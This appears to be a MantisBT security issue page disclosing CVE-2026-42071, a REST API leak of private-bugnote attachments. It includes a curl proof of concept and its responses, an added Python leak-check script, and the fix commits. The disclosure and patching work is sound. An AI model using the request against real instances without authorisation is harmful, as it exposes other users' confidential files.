View Issue Details

ID: 0036985
Project: mantisbt
Category: security
View Status: public
Last Update: 2026-05-09 19:56
Reporter: ninjasec
Assigned To: dregad
Priority: high
Severity: minor
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: 2.28.1
Target Version: 2.28.2
Fixed in Version: 2.28.2
Summary: 0036985: CVE-2026-42071: REST Issue File Listing Leaks Attachments From Hidden Private Bugnotes
Description

MantisBT exposes attachments linked to private bugnotes through the REST issue-file listing endpoint.

When a user can view an issue but cannot view a private bugnote on that issue, GET /api/rest/issues/{id}/files still returns attachments associated with the hidden note, including base64 file content. The normal file download path continues to enforce access control and returns 403 Forbidden, so the disclosure is specific to the listing/content API path.

The root cause is that file_api.php:296 checks bugnote attachment visibility against the parent issue instead of the bugnote itself:
return file_can_view_or_download( 'view', $t_bug_id, $p_uploader_user_id );

As a result, private-bugnote restrictions are skipped during attachment enumeration. IssueFileGetCommand.php:57 then reads and returns the attachment content for each enumerated file.

Affected Code

  • file_api.php:296
  • IssueFileGetCommand.php:57
  • issues_rest.php:539
Steps To Reproduce
  1. Create or use a public issue visible to a low-privileged user.
  2. Add a private bugnote to that issue as another user.
  3. Attach a file to that private bugnote.
  4. Authenticate as a lower-privileged user who can view the issue but not the private bugnote.
  5. Request the issue file list through REST.

In the verified case:

• issue id: 1
• hidden private bugnote id: 1
• leaked attachment id: 16
• leaked filename: private-note-attachment.txt

Visibility check for the low-privileged user showed only bugnotes 7 and 6 as visible:

7|10|2
6|50|2

Attachment 16 was linked to hidden bugnote 1:

16|1|1|1|private-note-attachment.txt

Proof of Concept

Request:

curl -i 'http://127.0.0.1:8082/api/rest/issues/1/files' \
  -H 'Authorization: REPORTER_API_TOKEN'

Observed response:

HTTP/1.1 200 OK
X-Mantis-Username: reporter
X-Mantis-LoginMethod: api-token
Content-Type: application/json

{
  "files": [
    {
      "id": 12,
      "reporter": {
        "id": 1,
        "name": "administrator"
      },
      "created_at": "2026-03-18T01:58:40+05:30",
      "filename": "soap-admin-issue1.txt",
      "size": 31,
      "content_type": "text/plain; charset=us-ascii",
      "content": "c29hcC1pc3N1ZS1yZXBvcnRlci1hdHRhY2htZW50Cg=="
    },
    {
      "id": 16,
      "reporter": {
        "id": 1,
        "name": "administrator"
      },
      "created_at": "2026-03-18T03:30:19+05:30",
      "filename": "private-note-attachment.txt",
      "size": 24,
      "content_type": "text/plain; charset=us-ascii",
      "content": "cHJpdmF0ZS1ub3RlLWF0dGFjaG1lbnQK"
    }
  ]
}

The second entry is the hidden private-bugnote attachment.

Control request:

curl -i 'http://127.0.0.1:8082/file_download.php?file_id=16&type=bug' \
  -b 'valid reporter web session cookies'

Observed response:

HTTP/1.1 403 Forbidden

Additional Information

Impact

A user who cannot view a private bugnote can still enumerate and retrieve attachments from that note through REST, including full file content. This is a confidentiality issue affecting private note attachments on otherwise visible issues.
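The proof of concept above is a differential test: the REST listing hands out an attachment that the classic download path refuses. The script below automates that comparison so an operator can check their own instance before and after upgrading. It is an added example, not part of the original report or of the MantisBT code base; it uses only the two URLs and headers shown in the proof of concept, and the base URL, API token and session cookie are placeholders to be supplied by the operator. The embedded sample listing is a constructed copy of the two entries in the observed response, with the download outcomes (200 for file 12, 403 for file 16) taken from the report.

```python
"""Differential check for CVE-2026-42071 (private-bugnote attachment leak).

GET /api/rest/issues/{id}/files returns every attachment of an issue with
inline base64 content, while file_download.php still enforces bugnote
visibility.  An attachment that appears in the listing but is refused
(403) by the download path therefore belongs to a bugnote the caller is
not allowed to see, and its content has already been disclosed.

Assumptions (not from the report): base URL, API token and session cookie
are placeholders supplied by the operator; the two request shapes are the
ones shown in the proof of concept.
"""
import base64
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, List

# Constructed sample: the two entries from the observed listing response.
SAMPLE_LISTING = {
    "files": [
        {"id": 12, "filename": "soap-admin-issue1.txt", "size": 31,
         "content": "c29hcC1pc3N1ZS1yZXBvcnRlci1hdHRhY2htZW50Cg=="},
        {"id": 16, "filename": "private-note-attachment.txt", "size": 24,
         "content": "cHJpdmF0ZS1ub3RlLWF0dGFjaG1lbnQK"},
    ]
}
# Constructed: download-path status per file id as observed in the report.
SAMPLE_DOWNLOAD_STATUS = {12: 200, 16: 403}


def list_issue_files(base_url: str, issue_id: int, api_token: str) -> dict:
    """REST listing as the low-privileged user (api-token authentication)."""
    req = urllib.request.Request(
        f"{base_url}/api/rest/issues/{issue_id}/files",
        headers={"Authorization": api_token},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def download_status(base_url: str, file_id: int, cookie: str) -> int:
    """HTTP status of the classic download path for the same user."""
    req = urllib.request.Request(
        f"{base_url}/file_download.php?file_id={file_id}&type=bug",
        headers={"Cookie": cookie},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def find_leaked_attachments(listing: dict,
                            status_of: Callable[[int], int]) -> List[Dict]:
    """Entries the listing served with content although download is refused.

    The base64 content is decoded and its length compared with the advertised
    size, so the result shows that real file bytes were disclosed rather than
    just metadata.
    """
    leaked = []
    for entry in listing.get("files", []):
        if status_of(entry["id"]) != 403 or "content" not in entry:
            continue
        data = base64.b64decode(entry["content"])
        leaked.append({
            "id": entry["id"],
            "filename": entry["filename"],
            "decoded_size": len(data),
            "size_matches": len(data) == entry.get("size"),
            "preview": data[:40].decode("utf-8", "replace"),
        })
    return leaked


def check_instance(base_url: str, issue_id: int,
                   api_token: str, cookie: str) -> List[Dict]:
    """Live check against one issue; an empty list means nothing leaked."""
    listing = list_issue_files(base_url, issue_id, api_token)
    return find_leaked_attachments(
        listing, lambda fid: download_status(base_url, fid, cookie))


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; for a live run call
    # check_instance("http://127.0.0.1:8082", 1, "REPORTER_API_TOKEN", "MANTIS_STRING_COOKIE=...").
    for hit in find_leaked_attachments(SAMPLE_LISTING, SAMPLE_DOWNLOAD_STATUS.get):
        print(f"leaked: id={hit['id']} {hit['filename']} "
              f"({hit['decoded_size']} bytes, size_matches={hit['size_matches']})")
```

Run it as the same low-privileged account on both paths: the token for the REST listing and that account's web session for file_download.php, as in the report. On a fixed instance the listing simply omits the private-note attachment, so an empty result means either that the fix is in place or that the account can genuinely see every note on the issue; test with an issue that is known to carry a private note the account cannot read. The check covers only the REST path; the changesets note that the SOAP API was affected through a separate code path and is not exercised here.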

Tags: No tags attached.

Relationships

related to 0027039 (closed, dregad): CVE-2020-25781: Access to private bug note attachments
has duplicate 0037092 (closed, dregad): Private Bugnote Attachment Content Leak via REST API
has duplicate 0037095 (closed, dregad): Private Bugnote Files Disclosure via REST API Get Issues Files Or SOAP API mc_issue_attachment_get

Activities

dregad (developer), 2026-04-19 20:01, note ~0071041 (last edited 2026-04-24 08:05)

Advisory https://github.com/mantisbt/mantisbt/security/advisories/GHSA-pw5x-2mf9-3xc8, CVE request sent.

dregad (developer), 2026-04-28 12:30, note ~0071051

CVE-2026-42071 assigned

dregad (developer), 2026-05-02 09:36, note ~0071061

@ninjasec Patch is ready for review, https://github.com/mantisbt/mantisbt-private/pull/5. Looking forward to receiving your feedback.

While testing, I realized that the SOAP API was vulnerable as well, but from a different code path. Fix is included in the PR.

Related Changesets

MantisBT: master-2.28 77d25d37 (dregad, 2026-05-02 06:25)

Add $p_bug_id parameter

file_can_download_bugnote_attachments() function's callers usually
already know the bug id. This avoids an unnecessary bugnote_get_field()
call.

Issue 0036985

Affected Issues: 0036985
Modified: core/file_api.php, file_download.php

MantisBT: master-2.28 5b7f5bc9 (dregad, 2026-05-02 06:29)

Fix Private Bugnote Attachment Leak via REST API

Add missing $p_bugnote_id argument to file_can_view_or_download() call
in file_can_view_bugnote_attachments. This fixes the incorrect access
check that was giving undue access to private attachments.

Fixes 0036985, GHSA-pw5x-2mf9-3xc8 / CVE-2026-42071

Affected Issues: 0036985
Modified: core/file_api.php

MantisBT: master-2.28 955cb50f (dregad, 2026-05-02 07:01)

Fix Private Bugnote Attachment Leak via SOAP API

Incomplete access checks in mci_file_can_download_bug_attachments()
resulted in unauthorized access to attachments.

The function has been removed and replaced by calls to standard file
API functions file_can_download_bug_attachments() and
file_can_download_bugnote_attachments().

Fixes 0036985, GHSA-pw5x-2mf9-3xc8 / CVE-2026-42071

Affected Issues: 0036985
Modified: api/soap/mc_file_api.php